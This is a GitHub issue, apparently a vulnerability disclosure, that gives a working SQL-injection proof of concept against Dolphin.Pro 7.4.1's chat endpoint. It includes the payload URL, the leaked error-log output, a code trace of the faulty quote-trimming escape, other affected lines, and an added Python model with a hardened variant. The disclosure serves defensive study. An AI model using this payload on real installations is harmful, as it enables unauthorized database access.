boonex / dolphin.pro

Dolphin.Pro - Social Network Platform
http://www.boonex.com
MIT License
146 stars, 138 forks

SQL injection vulnerability bypass filtering #683

Closed SimpleLexie closed 5 years ago

SimpleLexie commented 5 years ago

version: Dolphin-v.7.4.1

POC:

http://localhost/flash/XML.php?module=chat&app=1&action=RzSetBlocked&id=admin%27&user=%2bextractvalue(1,concat(0x7e,user()))%23&blocked=true

After submitting, view the tmp/error.log file:

```
--- 2019-04-15T09:25:16+00:00
Type: PDOException
Message: SQLSTATE[HY000]: General error: 1105 XPATH syntax error: '~root@DESKTOP-9ELD8JS'
File: E:\TODO\Dolphin-v.7.4.1\inc\classes\BxDolDb.php
Line: 169
Trace:
#0 E:\TODO\Dolphin-v.7.4.1\inc\classes\BxDolDb.php(169): PDO->query('REPLACE INTO `s...')
#1 E:\TODO\Dolphin-v.7.4.1\flash\modules\global\inc\db.inc.php(17): BxDolDb->res('REPLACE INTO `s...')
#2 E:\TODO\Dolphin-v.7.4.1\flash\modules\global\inc\db.inc.php(51): BxDbConnect->getResult('REPLACE INTO `s...')
#3 E:\TODO\Dolphin-v.7.4.1\flash\modules\chat\inc\customFunctions.inc.php(70): getResult('REPLACE INTO `s...')
#4 E:\TODO\Dolphin-v.7.4.1\flash\modules\chat\inc\actions.inc.php(123): blockUser('admin\', ',Profile=extr...', true)
#5 E:\TODO\Dolphin-v.7.4.1\flash\XML.php(52): require_once('E:\TODO\Dolphin...')
#6 {main}
```

details:

Step 1: /flash/modules/chat/inc/actions.inc.php, Line 10 and Line 120

```php
// Line 10
$sId = isset($_REQUEST['id']) ? process_db_input($_REQUEST['id']) : "";
......
// Line 120
case 'RzSetBlocked':
    $sUser = isset($_REQUEST['user']) ? process_db_input($_REQUEST['user']) : "";   // <-- process_db_input
    $bBlocked = isset($_REQUEST['blocked']) ? $_REQUEST['blocked'] == TRUE_VAL : false;
    blockUser($sId, $sUser, $bBlocked);
    break;
```

Step 2: Track to process_db_input()

```php
function process_db_input($sText, $iStripTags = 0)
{
    ......
        return $sText;
    }
    ......
    switch ($iStripTags) {
        case BX_TAGS_STRIP_AND_NL2BR:
            return $oDb->escape(nl2br(strip_tags($sText)), false);
        ......
        case BX_TAGS_NO_ACTION:
        default:
            return $oDb->escape($sText, false);   // <-- escape() called with $bReal = false
    }
}
```

Then, track to escape():

```php
public function escape($sText, $bReal = true)
{
    $pdoEscapted = $this->link->quote($sText);

    if ($bReal) {
        return $pdoEscapted;
    }
    return trim($pdoEscapted, "'");   // <-- trim() strips the surrounding quotes again
}
```

The function quote() adds escaping to the character, such as: `admin'` --> `'admin\''`

The function trim() removes the characters at the beginning and end of the string, such as: `'admin\''` --> `admin\`

Step 3: Track to blockUser():

```php
function blockUser($iUserId, $iBlockedId, $bBlock)
{
    bx_import('BxDolAlerts');

    if ($bBlock) {   // <-- $bBlock
        getResult("REPLACE INTO `sys_block_list` SET `ID` = '" . $iUserId . "', `Profile` = '" . $iBlockedId . "'");
        $oZ = new BxDolAlerts('block', 'add', $iBlockedId, $iUserId);
    } else {
        getResult("DELETE FROM `sys_block_list` WHERE `ID` = '" . $iUserId . "' AND `Profile` = '" . $iBlockedId . "'");
        $oZ = new BxDolAlerts('block', 'delete', $iBlockedId, $iUserId);
    }
    $oZ->alert();
}
```

When $bBlock is true, the function getResult() is called, and the SQL string is:

```sql
REPLACE INTO `sys_block_list` SET `ID` = '$iUserId', `Profile` = '$iBlockedId'
```

So... when submitting via browser `id=admin%27&user=%2bextractvalue(1,concat(0x7e,user()))%23&blocked=true`:

- `id=admin%27` --> process_db_input() --> `admin\`
- `user=%2bextractvalue(1,concat(0x7e,user()))%23` --> `+extractvalue(1,concat(0x7e,user()))#`

Then the parameters are passed to the function blockUser(), and the SQL string is:

```sql
REPLACE INTO `sys_block_list` SET `ID` = 'admin\', `Profile` = '+extractvalue(1,concat(0x7e,user()))#'
```

Q^Q... SQL injection is back. In this way, as long as the two parameters are spliced together, SQL injection vulnerabilities may occur.

Other similar scenes:

- /flash/modules/chat/inc/actions.inc.php Line 137
- /flash/modules/chat/inc/actions.inc.php Line 156
- /flash/modules/chat/inc/actions.inc.php Line 180
- /flash/modules/chat/inc/actions.inc.php Line 198
- /flash/modules/chat/inc/actions.inc.php Line 210
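The escape chain the report walks through (quote(), then trim() of the surrounding quotes, then manual re-quoting in the query), modelled in Python as an added example. This is not Dolphin's code or the reporter's: it assumes PDO::quote() on the MySQL driver backslash-escapes the same characters as mysql_real_escape_string(), tracks only single-quoted literals when it re-parses the query, and the `block_query_hardened` variant is a hypothetical fix that simply keeps quote()'s delimiters instead of trimming them.

```python
# Added example (not Dolphin code): model of escape()/trim() from the report,
# showing why two process_db_input() values spliced into one query let the
# second value land outside its quotes.
# Assumptions: PDO::quote() on the MySQL driver escapes the same characters as
# mysql_real_escape_string(); only single-quoted literals are tracked below.

MYSQL_ESCAPES = {
    "\0": "\\0", "\n": "\\n", "\r": "\\r", "\\": "\\\\",
    "'": "\\'", '"': '\\"', "\x1a": "\\Z",
}


def mysql_quote(text: str) -> str:
    """Mimic PDO::quote() (MySQL driver): backslash-escape, then wrap in quotes."""
    return "'" + "".join(MYSQL_ESCAPES.get(c, c) for c in text) + "'"


def escape_like_bxdoldb(text: str, real: bool = True) -> str:
    """Model of BxDolDb::escape($sText, $bReal) as quoted in the report."""
    quoted = mysql_quote(text)
    if real:
        return quoted
    # $bReal = false path: trim($pdoEscapted, "'") strips *every* leading and
    # trailing quote, so an escaped quote at the end loses its quote character
    # and a bare backslash is left behind:  admin'  ->  'admin\''  ->  admin\
    return quoted.strip("'")


def process_db_input(text: str) -> str:
    """Default branch of process_db_input(): escape() with $bReal = false."""
    return escape_like_bxdoldb(text, real=False)


def block_query_as_reported(user_id: str, blocked_id: str) -> str:
    """Query string blockUser() builds for $bBlock = true (manual quoting)."""
    return ("REPLACE INTO `sys_block_list` SET `ID` = '" + process_db_input(user_id)
            + "', `Profile` = '" + process_db_input(blocked_id) + "'")


def block_query_hardened(user_id: str, blocked_id: str) -> str:
    """Hypothetical fix: keep quote()'s own delimiters, drop the manual quotes."""
    return ("REPLACE INTO `sys_block_list` SET `ID` = " + escape_like_bxdoldb(user_id)
            + ", `Profile` = " + escape_like_bxdoldb(blocked_id))


def text_outside_literals(sql: str) -> str:
    """Return the parts of `sql` a MySQL parser would treat as syntax, not data.

    Honours backslash escapes and doubled quotes inside single-quoted literals.
    """
    out, i, in_string = [], 0, False
    while i < len(sql):
        ch = sql[i]
        if in_string:
            if ch == "\\":
                i += 2                      # escaped character stays inside the literal
                continue
            if ch == "'":
                if sql[i + 1:i + 2] == "'":
                    i += 2                  # '' is an escaped quote, not a terminator
                    continue
                in_string = False
        elif ch == "'":
            in_string = True
        else:
            out.append(ch)
        i += 1
    return "".join(out)


def injected(sql: str, marker: str = "extractvalue(") -> bool:
    """True if the payload marker ended up outside every string literal."""
    return marker in text_outside_literals(sql)


if __name__ == "__main__":
    # Constructed inputs mirroring the report's PoC parameters.
    uid, payload = "admin'", "+extractvalue(1,concat(0x7e,user()))#"
    for label, query in (("as reported", block_query_as_reported(uid, payload)),
                         ("hardened", block_query_hardened(uid, payload))):
        print(f"{label}: {query}\n  injected: {injected(query)}")
```

With `id=admin` (no trailing quote) the same payload stays inside its literal, which is why the bug only surfaces when two such values are concatenated into one statement. The hardened variant only removes the trim to keep to the report's point; in a real fix the values would go through prepared-statement placeholders rather than any string escaping.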